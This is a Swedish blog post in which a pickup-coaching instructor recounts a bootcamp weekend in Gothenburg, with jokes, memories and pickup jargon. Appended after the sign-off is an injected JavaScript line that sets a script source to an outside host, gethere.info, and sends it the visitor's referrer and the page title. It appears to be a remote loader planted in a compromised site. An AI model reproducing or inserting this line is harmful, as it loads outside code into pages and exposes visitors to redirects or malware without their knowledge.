Ännu en bootcamp är till ända och med den en mycket trevlig helg i Göteborg. Jag vill skicka ett stort tack till deltagarna för att ni gett mig och de andra instruktörerna ännu en inspirerande helg i vårt jobb. Det är alltid lika kul att se människor utvecklas och vidga sin egen verklighet!

Jag skulle vilja sammanfatta helgen som en tre dagars resa där jag fick se alla studenter utmana sig själva och växa, stundom genom hårt arbete, sänkt panna och med ”ett set till” inpräntat i hjärnan och stundom med ett brett leende på läpparna och stolthet i blicken. Det är precis så utveckling brukar se ut har jag märkt… Ibland är den frukten av hårt arbete och ibland kommer den som ketchup ur en flaska. Vilket som än är fallet så är ens egen personliga utveckling ALLTID något att vara stolt över och fira, det är ett som är säkert.

Saker som jag specifikt kommer att minnas från helgen är de glada skratten i lördags kväll, den tjocka malaysiska mannen som sjöng ”Staying Alive” med the Beegee’s i perfekt falsett eller minen på deltagarnas ansikten när undertecknad kom in på seminariet endast iklädd handduk och stolt proklamerade att jag skulle prata lite om ”sexual frame”! (jag hade låst in nyckeln till rummet)

Blandat med oväntade logistiska sista-minuten problem som fick lösas kreativt kommer jag också att minnas Xtreemes minituöst koordinerade dans till ”Billie Jean”, när Superman k-closeade jultomten och alla de olika gånger vi stolt kunde konstatera att studenterna utvecklats och förbättrat konkreta saker i sitt game. Jag spår en ljus framtid för er, grabbar. Keep pushing it!

Så med det sista minnet av en instruktörskollega som med en tår i ögat som liksom en stolt far blickade ut över ett dansgolv i Göteborg och bevittnade en student som öppnade ett 5set precis som han blivit instruerad och med framgång vill jag säga detta;

Flame, Neptune, Superiority ochWorm – welcome to the C-R family!

-Sanji

PS. You’re an emotional chode, and I love you for it. icon wink Crying at the discoteque! DS.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;